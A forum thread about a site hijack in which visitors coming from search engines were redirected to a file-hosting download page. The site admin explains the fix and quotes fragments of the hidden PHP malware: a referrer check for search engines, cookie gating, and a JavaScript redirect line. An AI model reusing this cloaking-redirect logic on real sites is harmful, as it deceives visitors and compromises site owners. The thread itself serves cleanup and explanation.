Came in cleanly after being away about 8 hours! I hope this is a good sign that the misc.php was the culprit. Did you have the security guys look at misc.php?
MyFilestore.com - Your Free File Hosting ?
- Thread starter Hall
- Start date
- Latest activity Latest activity:
- Replies 173
- Views 20K
- Status
misc.php is a strange file, it lets you call other web pages and other things using misc.php.
What I did was I renamed the file to something else, then where the site needs misc.php I updated the code to call the new file. Since misc.php is not needed for every page call then it wont pop it gets rid of the hyjack, since no one is accessing it coming from Google or Yahoo.
The security company is shocked I was able to get rid of it this way.
What I did was I renamed the file to something else, then where the site needs misc.php I updated the code to call the new file. Since misc.php is not needed for every page call then it wont pop it gets rid of the hyjack, since no one is accessing it coming from Google or Yahoo.
The security company is shocked I was able to get rid of it this way.
Sounds like they owe you a refund.
Are any of their other clients entangled in this problem?
Sounds like a "grep misc.php *" is in order in all the http files and see if you can find the culprit. I wonder if it was a "gift" left over from when the site was hacked...
BTW this is part of the code that was being called, hidden in base64 encoding...
This line would see where you were coming from....
$r = @preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i', $t);
This line would check for its cookie
if (empty($_COOKIE[$n])) {
if ($a && isset($_GET['v']) && (isset($_GET['g'])) && (!empty($_COOKIE[$c]))) {
This would give you a cookie, so that it wouldnt happen again for 36000 seconds (10 hours)
setcookie($n, 'en', time() + 36000);$m = substr(md5($h), 0, 8);
Then finally it would sent you to to the bad site...
print("document.location='http://myfilestore.com/download.php?id={$m}'");
$r = @preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i', $t);
This line would check for its cookie
if (empty($_COOKIE[$n])) {
if ($a && isset($_GET['v']) && (isset($_GET['g'])) && (!empty($_COOKIE[$c]))) {
This would give you a cookie, so that it wouldnt happen again for 36000 seconds (10 hours)
setcookie($n, 'en', time() + 36000);$m = substr(md5($h), 0, 8);
Then finally it would sent you to to the bad site...
print("document.location='http://myfilestore.com/download.php?id={$m}'");
Last edited:
So it was only affecting people who came from Live, Google, Yahoo ... and three, I presume, Russian, search sites ?
Yup.
BTW I am going to remove the code I posted above as it sets off the Web Shield Alert in AVAST.
BTW I am going to remove the code I posted above as it sets off the Web Shield Alert in AVAST.
It was so nice to come here on first try today. I still wonder where that sneaky code came from.
It really doesn't matter. If someone was able to write to that file, they could very well have had access to a lot more !
Wasn't everything wiped/reloaded after the hack/shutdown of the site a few months ago ? If so, either this (modified) file was restored or someone got in again later.
It came in via a vbseo file which was not removed from the system.
It's gone now.
Sent from my iPhone using SatelliteGuys
It's gone now.
Sent from my iPhone using SatelliteGuys
- Status
